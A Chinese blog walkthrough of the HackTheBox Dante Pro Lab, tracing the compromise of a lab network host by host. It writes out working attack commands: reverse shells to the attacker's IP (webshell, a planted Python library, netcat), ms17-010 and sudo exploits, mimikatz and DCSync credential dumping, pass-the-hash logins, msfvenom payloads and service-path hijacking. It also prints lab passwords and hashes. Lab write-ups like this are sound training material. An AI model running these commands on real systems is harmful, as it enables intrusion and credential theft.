AD域内网渗透 Dante prolabs

已于 2025-04-13 18:44:38 修改
阅读量568 收藏 6
点赞数 6
分类专栏: 靶机 AD域内网渗透 文章标签: 安全
于 2025-04-12 16:54:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33522010/article/details/147080257
版权

记录一下整个渗透流程

10.10.110.100

漏洞发现和利用

先使用nmap -sn 10.10.110.0/24扫描在线主机
发现100主机在线,进行nmap扫描

nmap -sC -sV -T4 -p- -n 10.10.110.100

扫描结果:

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.2
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV IP 172.16.1.100 is not the same as 10.10.110.100
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 8f:a2:ff:cf:4e:3e:aa:2b:c2:6f:f4:5a:2a:d9:e9:da (RSA)
|   256 07:83:8e:b6:f7:e6:72:e9:65:db:42:fd:ed:d6:93:ee (ECDSA)
|_  256 13:45:c5:ca:db:a6:b4:ae:9c:09:7d:21:cd:9d:74:f4 (ED25519)
65000/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 2 disallowed entries 
|_/wordpress DANTE{Y0u_Cant_G3t_at_m3_br0!}
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel*

然后通过dirsearch扫描发现wordpress目录

dirsearch -u http://10.10.110.100:65000 -w /usr/share/seclists/Discovery/Web-Content/common.txt

http://10.10.110.100:65000/wordpress/

或者通过robots.txt文件,查看

Disallow: /wordpress
Disallow: DANTE{Y0u_Cant_G3t_at_m3_br0!}

因为是wordpress,可以使用wpscan:

wpscan --url http://10.10.110.100:65000/wordpress/ -e p,t,u --plugins-detection aggressive -t 20

通过上面wpscan的扫描发现上传目录:

http://10.10.110.100:65000/wordpress/wp-content/uploads/

下面是扫描结果,包括扫描出来的用户:

[+] james
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.110.100:65000/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.110.100:65000/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
[+] James James
 | Found By: Rss Generator (Passive Detection)

然后还发现wp-config.php.swp 备份文件,可以下载查看:

define( 'DB_COLLATE', '' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_CHARSET', 'utf8mb4' );
/** Database Charset to use in creating database tables. */
define( 'DB_HOST', 'localhost' );
/** MySQL hostname */
define( 'DB_PASSWORD', 'password' );
/** MySQL database password */
define( 'DB_USER', 'shaun' );
/** MySQL database username */
define( 'DB_NAME', 'wordpress' );

James无法顺利使用rockyou字典进行破解,所以准备使用cewl工具,根据博客页面创建一个密码字典

cewl http://10.10.110.100:65000/wordpress/index.php/languages-and-frameworks/ > pass.txt

然后进行破解

wpscan --url http://10.10.110.100:65000/wordpress/ --passwords ./pass.txt --usernames james

破解到密码是 Toyota,然后使用凭证James : Toyota进入wp,准备拿shell

我是上传kali自带的simple-backdoor.php,在上传插件位置
在这里插入图片描述
payload :

http://10.10.110.100:65000/wordpress/wp-content/uploads/2025/03/simple-backdoor.php?cmd=busybox%20nc%2010.10.14.5%20443%20-e%20/bin/sh

拿到shell
在这里插入图片描述

枚举

准备swtich users,切换到另外的用户:
接着拿到一个shell TTY:

python3 -c 'import pty;pty.spawn("/bin/bash");'
export TERM=xterm-256color
Ctrl + z
stty raw -echo;fg
reset

调整窗口

stty size
stty rows 32 columns 116

搜索flag

find / -name flag* 2>/dev/null

发现在james目录下,/home/James/flag.txt,但是无法访问,下一步切换到james。

想起之前的mysql凭证:

shaun :password

连接mysql,进行枚举:

mysql -h 127.0.0.1 -u shaun -p

在这里插入图片描述
在这里插入图片描述
尝试破解密码,但是失败

James:
$P$B/kdWnMDyh1oMT0QCG9YAyEu8Yt.M0.
Admin:
$P$BiINvM48wJ1iyfwOroCTdFhjB2qOvO.

尝试su james,使用Toyota成功
在这里插入图片描述

拿到flag:

DANTE{j4m3s_NEEd5_a_p455w0rd_M4n4ger!}

提权

suid find
在这里插入图片描述

找到密码 mysql -u balthazar -p TheJoker12345!
在这里插入图片描述
尝试利用suid find 提权

/usr/bin/find . -exec /bin/sh -p \; -quit

成功
在这里插入图片描述

目前有2个凭证:

James : Toyota
balthazar : TheJoker12345!

ssh登陆:
ssh balthazar@10.10.110.100 -p 22

建立内网隧道,使用ligolo-ng,使用比较简单
先上传agent

wget http://10.10.14.2/agent_amd64_linux

kali端开启proxy,等待连接,忽视证书

./proxy -selfcert

然后连接到kali

./agent_amd64_linux -connect 10.10.14.2:11601 -ignore-cert

在这里插入图片描述
然后使用session选择连接的靶机,开始配置隧道:

interface_create --name "e1"
interface_add_route --name e1 --route 172.16.1.0/24
tunnel_start --tun e1

然后就可以直接扫描内网网段主机了,可以配合fscan 扫描内网存活主机 跳过端口指纹识别

./fscan_arm64 -h 172.16.1.0/24 -skip -p main

172.16.1.12

SQL注入

PORT     STATE SERVICE  VERSION
21/tcp   open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (ProFTPD) [::ffff:172.16.1.12]
|     Invalid command: try being more creative
|     Invalid command: try being more creative
|   RTSPRequest: 
|_    220 ProFTPD Server (ProFTPD) [::ffff:172.16.1.12]
22/tcp   open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 04:fb:b6:1a:db:95:46:b7:22:13:61:24:76:80:1e:b8 (ECDSA)
|_  256 ae:c4:55:67:6e:be:ba:65:54:a3:c3:fc:08:29:24:0e (ED25519)
80/tcp   open  http     Apache httpd 2.4.43 ((Unix) OpenSSL/1.1.1g PHP/7.4.7 mod_perl/2.0.11 Perl/v5.30.3)
| http-title: Welcome to XAMPP
|_Requested resource was http://172.16.1.12/dashboard/
|_http-server-header: Apache/2.4.43 (Unix) OpenSSL/1.1.1g PHP/7.4.7 mod_perl/2.0.11 Perl/v5.30.3
443/tcp  open  ssl/http Apache httpd 2.4.43 ((Unix) OpenSSL/1.1.1g PHP/7.4.7 mod_perl/2.0.11 Perl/v5.30.3)
| http-title: Welcome to XAMPP
|_Requested resource was https://172.16.1.12/dashboard/
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=localhost/organizationName=Apache Friends/stateOrProvinceName=Berlin/countryName=DE
| Not valid before: 2004-10-01T09:10:30
|_Not valid after:  2010-09-30T09:10:30
|_http-server-header: Apache/2.4.43 (Unix) OpenSSL/1.1.1g PHP/7.4.7 mod_perl/2.0.11 Perl/v5.30.3
|_ssl-date: TLS randomness does not represent time
3306/tcp open  mysql    MariaDB 10.3.24 or later (unauthorized)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.95%I=7%D=4/11%Time=67F872BF%P=aarch64-unknown-linux-gnu%
SF:r(GenericLines,8F,"220\x20ProFTPD\x20Server\x20\(ProFTPD\)\x20\[::ffff:
SF:172\.16\.1\.12\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\
SF:x20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20cr
SF:eative\r\n")%r(RTSPRequest,33,"220\x20ProFTPD\x20Server\x20\(ProFTPD\)\
SF:x20\[::ffff:172\.16\.1\.12\]\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

发现phpinfo:

http://172.16.1.12/dashboard/phpinfo.php

可以得到一些信息
System = Linux DANTE-NIX04 5.4.0-48-generic #52~18.04.1-Ubuntu SMP Thu Sep 10 12:50:22 UTC 2020 x86_64

快速目录扫描:

dirsearch -u http://172.16.1.12/ -w /usr/share/seclists/Discovery/Web-Content/common.txt

发现blog目录:
在这里插入图片描述
根据页面信息,尝试google一些是否有历史漏洞
在这里插入图片描述
可能存在sql注入漏洞,暂时无法确认版本,可以尝试一下
在这里插入图片描述
详细利用方法:
在这里插入图片描述
确实存在
在这里插入图片描述
使用sqlmap:

sqlmap -u 'http://172.16.1.12/blog/category.php?id=1' --dbs --batch

在这里插入图片描述发现7个数据库:

available databases [7]:                                                                                                                 
[*] blog_admin_db
[*] flag
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

可以拿到flag

sqlmap -u 'http://172.16.1.12/blog/category.php?id=1' -D flag --batch -T flag --dump

在这里插入图片描述
接着查看blog_admin_db库中的凭据
可以得到ben的凭据
ben : 442179ad1de9c25593cabf625c0badb7
成功破解,尝试ssh登陆
在这里插入图片描述

拿到shell

ssh ben@172.16.1.12
在这里插入图片描述
拿到flag
在这里插入图片描述
可以上传linPEAS脚本进行枚举准备提权

提权

sudo 版本为1.8.27
在这里插入图片描述
搜索一下相关利用
使用sudo -l,发现无法使用sudo /bin/bash提升权限
在这里插入图片描述
搜索到一个利用方式可以绕过
在这里插入图片描述

sudo -u#-1 /bin/bash

成功绕过,提权
在这里插入图片描述
可以拿到flag
在这里插入图片描述
然后可以查看/etc/shadow文件:

julian:$1$CrackMe$U93HdchOpEUP9iUxGVIvq/:18439:0:99999:7:::

暗示需要我们破解这个用户密码,这个用户凭证也是后面需要用到的

hashcat -m 500 hash /usr/share/wordlists/rockyou.txt

得到密码
在这里插入图片描述

172.16.1.20

445端口漏洞扫描

nmap -PN --script smb-vuln* -p139,445 <ip> 

Nmap scan report for 172.16.1.20
Host is up (0.88s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

msf利用:
exploit/windows/smb/ms17_010_psexec
在这里插入图片描述
已经是最高权限
在这里插入图片描述

枚举

flag等文件查找:

powershell Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.config,*.kdbx,*.lnk -File -Recurse -ErrorAction SilentlyContinue

拿到flag:

type C:\Users\katwamba\Desktop\flag.txt

还发现employee_backup.xlsx,下载到本地,有用户名和密码
在这里插入图片描述

然后上传mimikatz.exe,尝试导出用户hash:

privilege::debug
token::elevate
lsadump::sam

Administrator : 9bff06fe611486579fb74037890fda96
在这里插入图片描述

然后使用 sekurlsa::logonpasswords
发现
xadmin :649f65073a6672a9898cb4eb61f9684a
在这里插入图片描述

katwamba : 14a71f9e65448d83e8c63d46355837c3
在这里插入图片描述

拿到两个用户的hash 尝试破解,失败
NTLM破解密码
hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule —force

密码喷洒:
17:katwamba : 14a71f9e65448d83e8c63d46355837c3
20:xadmin :649f65073a6672a9898cb4eb61f9684a 管理员

再次进入20dc进行smb枚举:
evil-winrm -u ‘katwamba’ -H ‘14a71f9e65448d83e8c63d46355837c3’ -i 172.16.1.20

上传Rubeus.exe

直接登陆
impacket-psexec -hashes :14a71f9e65448d83e8c63d46355837c3 katwamba@172.16.1.20

net user mrb3n /domain
密码修改 : net user “mrb3n” “password123!” /domain

bloodhound

bloodhound-python --dns-tcp -ns 172.16.1.20 -d DANTE.local -u 'mrb3n' -p 'password123!' -c All --zip -v

在 DC01 中扫描 172.16.2.0/24 网段,可以发现存活主机

172.16.1.17

端口扫描

Nmap scan report for 172.16.1.17
Host is up (0.43s latency).
Not shown: 46 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.41
139/tcp   open  netbios-ssn Samba smbd 4
445/tcp   open  netbios-ssn Samba smbd 4
10000/tcp open  http        MiniServ 1.900 (Webmin httpd)

使用172.16.1.20的凭据进行SMB枚举:
在这里插入图片描述
使用凭据进入(因为前面拿到DC01的管理员权限,我们可以直接修改用户名密码,password123!)

smbclient //172.16.1.17/forensics -U 'DANTE.local\xadmin' —password=password123!

在这里插入图片描述
可以拿到一个monitor,流量包文件,用wireshark进行分析,得到密码

user=admin&pass=Password6543

访问80端口

http://172.16.1.17/
在这里插入图片描述
漏洞搜索

searchsploit webmin 1.9

发现存在RCE
Webmin 1.900 - Remote Command Execution (Metasploit)

利用

在这里插入图片描述
用到前面拿到的凭证

Use linux/http/webmin_packageup_rce

可以直接拿到最高权限shell

172.16.1.10

漏洞发现和利用

namp扫描

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 4
445/tcp open  netbios-ssn Samba smbd 4
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

然后进行smb匿名枚举:

nxc smb 172.16.1.0/24 -u 'anonymous' -p ''  --shares

在这里插入图片描述
进入:

smbclient //172.16.1.10/SlackMigration -U 'anonymous'  --password=‘’

在这里插入图片描述

下载,打开在smb上下载的文件
在这里插入图片描述

-從網頁根目錄移除 wordpress 安裝 - PENDING
-在 Ubuntu 機器上恢復 Slack 整合 - 待定
-移除舊的員工帳號 - 完成
-通知 Margaret 新的變更 - 完成
-移除升級為管理員後 Margarets 帳戶上的帳戶限制 - 待定

在这里插入图片描述
发现ssrf漏洞
在这里插入图片描述

目录遍历漏洞
在这里插入图片描述

发现两个用户
frank
Margaret
可以使用

/nav.php?page=../../../../../../home/Margaret/flag.txt

拿到flag

读取wp-config.php文件

curl "http://172.16.1.10/nav.php?page=php://filter/convert.base64-encode/resource=../../../../../var/www/html/wordpress/wp-config.php" -v

在这里插入图片描述

使用 echo “编码” | base64 -d

发现凭证
在这里插入图片描述

ssh 登陆

ssh margaret@172.16.1.10 -p22

得到一个受限的shell,绕过限制
在这里插入图片描述

受限Shell Bypass

set shell=/bin/sh|:shell

然后通过linPEAS枚举,发现
margaret@DANTE-NIX02:/home/frank/Downloads/
有个压缩包,传到kali
'Test Workspace Slack export May 17 2020 - May 18 2020.zip’
在这里插入图片描述

找到密码
/home/Margaret/.config/Slack/exported_data/secure2020-05-18.json
在这里插入图片描述
切换到frank用户

提权

使用./pspy64
在这里插入图片描述
发现使用了urlib.py库,目录可以写入
写入恶意代码

echo 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.2",9998));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")' > urllib.py

提权成功
在这里插入图片描述

172.16.1.102

nmap扫描:

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/7.4.0)
|_http-server-header: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.0
|_http-title: Dante Marriage Registration System :: Home Page
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/7.4.0)
|_http-server-header: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.0
|_http-title: Dante Marriage Registration System :: Home Page
| tls-alpn: 
|   h2
|_  http/1.1
| ssl-cert: Subject: commonName=localhost/organizationName=TESTING CERTIFICATE
| Subject Alternative Name: DNS:localhost
| Not valid before: 2022-06-24T01:07:25
|_Not valid after:  2022-12-24T01:07:25
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
3306/tcp open  mysql         MySQL (unauthorized)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DANTE-WS03
| Not valid before: 2025-04-02T09:32:23
|_Not valid after:  2025-10-02T09:32:23
|_ssl-date: 2025-04-04T01:59:19+00:00; -7h58m28s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: DANTE-WS03
|   NetBIOS_Domain_Name: DANTE-WS03
|   NetBIOS_Computer_Name: DANTE-WS03
|   DNS_Domain_Name: DANTE-WS03
|   DNS_Computer_Name: DANTE-WS03
|   Product_Version: 10.0.19041
|_  System_Time: 2025-04-04T01:59:07+00:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

80端口

在这里插入图片描述
可以发现版本,经过搜索发现有历史漏洞

Online Marriage Registration System (OMRS) 1.0 RCE漏洞
https://www.exploit-db.com/exploits/49557

这个exploit利用需要注册好的用户名和密码
在这里插入图片描述
然后下载利用代码运行whoami测试:

python3 49557.py -u http://172.16.1.102:80/ -c 'whoami' -m 123456 -p qwe123

在这里插入图片描述
成功,下一步拿shell:
python3 49557.py -u http://172.16.1.102:80/ -c ‘curl http://10.10.14.4/nc.exe -o c:\Users\blake\nc.exe’ -m 123456 -p qwe123

而且发现,seImpersonatePrivilege令牌
在这里插入图片描述

后面可以用来提权
准备上传nc.exe

kali:rlwrap -cAr nc -lvnp 443
windows: c:\Users\Public\nc.exe 10.10.14.4 443 -e cmd.exe

payload:

python3 49557.py -u http://172.16.1.102:80/ -c 'c:\Users\blake\nc.exe 10.10.14.4 443 -e cmd.exe' -m 123456 -p qwe123

成功拿到shell
在这里插入图片描述

枚举:

查找文件

Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.config,*.kdbx,*.lnk -File -Recurse -ErrorAction SilentlyContinue

发现flag
在这里插入图片描述

下一步准备利用SeImpersonatePrivilege提权

提权

GodPotato 提权
检查.NET版本

reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP" /s

运行

GodPotato-NET4.exe -cmd ".\nc.exe -t -e C:\Windows\System32\cmd.exe 10.10.14.4 4444"

在这里插入图片描述

成功

172.16.2.5

需要搭建隧道,还是使用ligolo
在172.16.1.100开启端口转发,将1234转发到kali的11601端口,试用于环境中有多个内网段,主机无法连接到kali,可以使用转发

listener_add --addr 0.0.0.0:4343 --to 127.0.0.1:11601 —tcp

在这里插入图片描述
从DC01连接
在这里插入图片描述
配置好隧道后可以使用,简单的bash脚本扫描网段存活主机:

#!/bin/bash
start_ip=1
end_ip=254
network="172.16.2"

for ip in $(seq $start_ip $end_ip); do
    target_ip="$network.$ip"
    ping -c 1 -W 1 $target_ip > /dev/null
    if [ $? -eq 0 ]; then
        echo "$target_ip is up"
    else
        echo "$target_ip is down"
    fi
done

发现172.16.2.5在线
在这里插入图片描述

可以用之前得到的employee_backup表格文件做一个users和pass的用户名和密码的列表“
使用kerbrute_linux_arm64进行用户验证

./kerbrute_linux_arm64 userenum --dc 172.16.2.5 -d DANTE.ADMIN /home/kali/Desktop/Dante_prolabs/users.txt --downgrade

在这里插入图片描述
hash破解

john hash -wordlist=/usr/share/wordlists/rockyou.txt

在这里插入图片描述

jbercov:myspace7

进入 winrm
nxc winrm 172.16.2.5 -u ‘jbercov’ -p ‘myspace7’
在这里插入图片描述
收集,用bloodhound 查看

 SharpHound.exe -c all

横向移动

发现DCSync
impacket-secretsdump -just-dc-ntlm DANTE.ADMIN/jbercov@172.16.2.5
在这里插入图片描述
得到NTLM

Administrator:500:aad3b435b51404eeaad3b435b51404ee:4c827b7074e99eefd49d05872185f7f8:::

使用Psexec
impacket-psexec -hashes :4c827b7074e99eefd49d05872185f7f8 Administrator@172.16.2.5
在这里插入图片描述

经过枚举发现
C:\users\Administrator\Documents\Jenkins.bat

在这里插入图片描述
jenkins凭证: Admin_129834765 SamsungOctober102030
后面主机利用需要用到

在172.16.2.5主机,扫描网段:

for /l %i in (1,1,254) do @ping -n 1 -w 1000 172.16.2.%i > nul && echo 172.16.2.%i is up || echo 172.16.2.%i is down

发现172.16.2.101在线
![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/a243f43972ce4439ac955d515fb00f59.png
下一步就是在172.16.2.5,放置agent.exe,通过ligolo-ng建立通往101主机的隧道
下载:

certutil -urlcache -split -f http://10.10.14.2/agent.exe agent.exe

kali:

python3 -m http.server 80

在这里插入图片描述
在kali上操作,ligolo的操作就不仔细说了,后面总结一下,常见隧道搭建方法,主要用于类似OSCP考试过程中和平时的靶机环境。
端口转发绑定:

listener_add --addr 0.0.0.0:3333 --to 127.0.0.1:11601 --tcp

在这里插入图片描述
DC02:

agent.exe -connect 172.16.1.20:3333 -ignore-cert

在这里插入图片描述

成功连接
在这里插入图片描述
后续ligolo-ng就不写了,类似

172.16.1.19

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.41
8080/tcp open  http    Jetty 9.4.27.v20200227

8080

访问页面是Jenkins

可以用msf暴力破解:

auxiliary/scanner/http/jenkins_login

但是使用dc02 172.16.2.5 上发现凭证,让我们登陆

Admin_129834765 : SamsungOctober102030

主页可以发现flag
在这里插入图片描述

jenkis常规利用

busybox nc 10.10.14.4 443 -e /bin/sh

在这里插入图片描述

提权

6(disk)利用

使用pspy64
可以发现ian用户的密码(VPN123ZXC):
| /bin/sh -c /bin/bash mysql -u ian -p VPN123ZXC

可以切换用户使用id,发现ian用户是6(disk)组成员
利用方式:

debugfs /dev/sda5

https://www.hackingarticles.in/disk-group-privilege-escalation/
可以读flag

在这里插入图片描述

cve-2021-3560提权

在这里插入图片描述

利用工具:

https://github.com/swapravo/polkadots

polkadots -a boris -n 'Boris Ivanovich Grishenko' -h '$6$W6CqwvYkGgANzwkd$gcp0nKH8lZ.t9vr.IMtw/02gNd3U1cgwDkCY0H.wqXjvnDHpsBURTLkcziCzznPmy6PFMaEfSe3yErSu1BDeM1' -i 20

172.16.1.13

端口扫描

PORT    STATE SERVICE       VERSION
80/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.7)
443/tcp open  ssl/http      Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.7)
445/tcp open  microsoft-ds?

phpinfo

http://172.16.1.13/dashboard/phpinfo.php
在这里插入图片描述

Windows NT DANTE-WS01 10.0 build 18363 (Windows 10) AMD64

目录扫描

dirsearch -u http://172.16.1.13/ -w /usr/share/seclists/Discovery/Web-Content/common.txt

访问网站
在这里插入图片描述
发现默认密码admin :admin
http://172.16.1.13/discuss/admin/home.php
经过google,发现存在历史漏洞Online Discussion Forum Site 1.0 - Remote Code Execution

https://www.exploit-db.com/exploits/48512

然后 http://172.16.1.13/discuss/ups/ 可以看见上传的webshell
成功访问webshell
http://172.16.1.13/discuss/ups/winshell.php?cmd=dir
在这里插入图片描述
下面使用

https://www.revshells.com/ 的Ivan Sincek phpshell

在这里插入图片描述
成功拿到shell

提权

经过枚举发现服务
inSyncCPHService(Druva inSync Client Service)[“C:\Program Files (x86)\Druva\inSync\inSyncCPHwnet64.exe”] - Auto - Running

经过搜索,发现漏洞利用

https://www.exploit-db.com/exploits/48505

python.exe C:\Users\gerald\48505.py "windows\system32\cmd.exe /C c:\Users\gerald\nc.exe 10.10.14.4 443 -e cmd.exe"

在这里插入图片描述

172.16.1.101

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           FileZilla ftpd 0.9.60 beta
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

FTP 爆破

用我们之前收集到的凭证,内网渗透中,凭证的收集和整理非常重要

hydra -L /home/kali/Desktop/Dante_prolabs/users.txt -P /home/kali/Desktop/Dante_prolabs/password.txt ftp://172.16.1.101 -vV  -t 64 -w 30

在这里插入图片描述
破解到
dharding : WestminsterOrange5
登陆后可以下载txt文件
在这里插入图片描述
查看
在这里插入图片描述
提示密码有变化,目前密码为:
WestminsterOrange5
可以针对后面的数字进行破解,使用445 smb进行验证是否正确。可以使用nxc
可以用python3简单生成一下1-100的密码文本用来破解

for i in range(1, 101):
    print(f"WestminsterOrange{i}")

在这里插入图片描述

winrm进入系统

nxc smb 172.16.1.101 -u dharding -p ./hash

发现密码是17的位置
在这里插入图片描述
测试winrm,发现是管理员,可以进入拿到shell

nxc winrm 172.16.1.101 -u dharding -p 'WestminsterOrange17'

在这里插入图片描述

evil-winrm -i 172.16.1.101 -u 'dharding' -p 'WestminsterOrange17'

在这里插入图片描述
成功拿到shell

提权

搜索:

Get-ChildItem -Path C:\Users\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.config -File -Recurse -ErrorAction SilentlyContinue

发现flag
在这里插入图片描述
上传winPEAS进行枚举

iwr -url 10.10.14.2/winPEASx64.exe -o winPEASx64.exe

进入目录后也可以发现qc文件
在这里插入图片描述
可以google一下 IObitUnSvr,搜索的时候发现是有问题的
在这里插入图片描述
在winpeas中的服务信息中也可以发现没有加引号,存在劫持的风险在这里插入图片描述
Unquoted Service Paths也是一个windows中经典的提权方法。
当我们拥有对服务的主目录或子目录的写入权限,但无法替换其中的文件时,我们可以使用此攻击。如果此文件的路径包含一个或多个空格,并且没有包含在引号中,可以利用提权
在这里插入图片描述
类似这样我们可以去尝试替换,然后重启服务,完成提权。
因为是:
C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win10_amd64\IURegistryFilter.sys
查看目录权限
看看能不能创建一个木马程序:C:\Program Files (x86)\IObit\IObit.exe
在这里插入图片描述
生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe > IObit.exe

移动到
C:\Program Files (x86)\IObit\IObit.ex
但该路径没有写入权限。

尝枚举ACL提权

可以用bloodhound,失败
可以使用powerview.ps1进行枚举
允许所有脚本执行

Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
Import-Module .\PowerView.ps1

查看服务状态,目前是停止状态

Get-Service -Name IObitUnSvr

在这里插入图片描述

查看ACL

Get-ACL "C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe"

在这里插入图片描述
发现dharding 用户拥有 完全控制 权限,这一块看了一下别人的做法学习一下:

使用Get-ServiceAcl.ps1
导入

. .\Get-ServiceAcl.ps1

"IObitUnSvr" | Get-ServiceAcl | select -ExpandProperty Access

在这里插入图片描述

发现 dharding 具备 ChangeConfig

在 Windows 操作系统中,ChangeConfig 是一种访问控制权限,通常与系统服务、注册表项或特定配置文件的修改权限相关联。具有ChangeConfig 权限的用户可以更改配置和设置,通常用于修改服务设置或配置文件的某些内容。

思路为更改服务的exe执行文件路径,然后重启服务即可提权。
生成一个恶意文件
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.2 LPORT=4443 -f exe -o hack.exe
并且上传

监听
lwrap -cAr nc -lvnp 4443

sc.exe stop IObitUnSvr
sc.exe config IObitUnSvr binPath="C:\Users\dharding\hack.exe"
sc.exe qc IObitUnSvr
sc.exe start IObitUnSvr

在这里插入图片描述
提权成功

172.16.2.101

nmap -sC -sV -Pn -T4 -n 172.16.2.101

发现只有22端口

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 20:d0:8e:88:ee:db:b4:cf:35:b7:db:cb:74:a0:50:0b (RSA)
|_  256 66:bb:0d:63:a8:1e:4c:24:fe:2c:7e:9e:3a:03:00:e6 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

上传一个meterpreter shell方便后续利用
在这里插入图片描述
先使用,增加路由
use multi/manage/autoroute

尝试进行ssh暴力破解
使用 :
auxiliary/scanner/ssh/ssh_login

在这里插入图片描述
成功,发现凭据,使用
sessions -l
可以看见shell
或者使用ligolo-ng建立隧道,因为是特定主机可以使用

interface_add_route --name e22 --route 172.16.2.101/32

sessions -i 3
进入 shell ,或者使用ligolo-ng建立隧道后直接登陆
在这里插入图片描述

提权

上传linpeas.sh进行枚举
经过枚举发现一个suid文件
在这里插入图片描述
/usr/sbin/readfile

或者使用CVE-2021-3560提权
在这里插入图片描述
成功提权
在这里插入图片描述
